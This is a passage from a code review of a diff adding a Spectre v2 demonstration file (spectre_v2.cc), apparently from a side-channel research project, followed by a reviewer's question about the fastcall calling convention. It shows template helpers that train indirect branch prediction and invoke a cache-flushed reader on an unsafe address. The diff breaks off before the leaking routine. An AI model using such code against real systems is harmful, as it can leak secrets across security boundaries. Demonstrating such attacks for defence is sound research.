demos/spectre_v2.cc

```diff
@@ -0,0 +1,296 @@
+ **/
+
+#include <array>
+#include <cstring>
+#include <iostream>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+
+const char *public_data = "Hello, world!";
+const char *private_data = "It's a s3kr3t!!!";
+
+// Recursive templates to repeat code without using .rept and inline assembly.
+// Generates NOP instructions.
+template<unsigned int N> struct Nops {
+  SAFESIDE_ALWAYS_INLINE static inline void generate() {
+    GenerateNop();
+    Nops<N - 1>::generate();
+  }
+};
+
+template<> struct Nops<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate() {
+    // Empty.
+  }
+};
+
+// Fetches an address N-times in a real reader.
+template<unsigned int N> struct Fetches {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(const void *addr) {
+    (void)*reinterpret_cast<const volatile char *>(addr);
+    Fetches<N - 1>::generate(addr);
+  }
+};
+
+template<> struct Fetches<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(const void *addr) {
+    // Empty.
+  }
+};
+
+// Repeatedly indirectly invokes a real reader on a safe address in the
+// LeakByte.
+template<unsigned int N> struct SafeCalls {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (*real_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL *real_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *safe_address) {
+    real_reader(safe_address);
+    SafeCalls<N - 1>::generate(real_reader, safe_address);
+  }
+};
+
+template<> struct SafeCalls<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (*real_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL *real_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *safe_address) {
+    // Empty.
+  }
+};
+
+// Repeatedly flushes a dummy reader from the cache and invokes it on an
+// unsafe address in LeakByte.
+template<unsigned int N> struct DummyCalls {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (**dummy_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL **dummy_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *unsafe_address) {
+    CLFlush(dummy_reader);
+    (*dummy_reader)(unsafe_address);
+    DummyCalls<N - 1>::generate(dummy_reader, unsafe_address);
+  }
+};
+
+template<> struct DummyCalls<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (**dummy_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL **dummy_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *unsafe_address) {
+    // Empty.
+  }
+};
+
+// We fastcall the readers in the 32-bit mode so that there is only one
```

Comment:
Asking to learn: what's a fastcall?

Reply:
fastcall is a calling convention on 32-bit X86. It's more similar to the standard X64 calling convention than the standard X86 calling convention. Notably it allows to pass first two (not 4 as on x64) arguments in registers instead of the stack: https://docs.microsoft.com/en-us/cpp/cpp/fastcall?view=vs-2019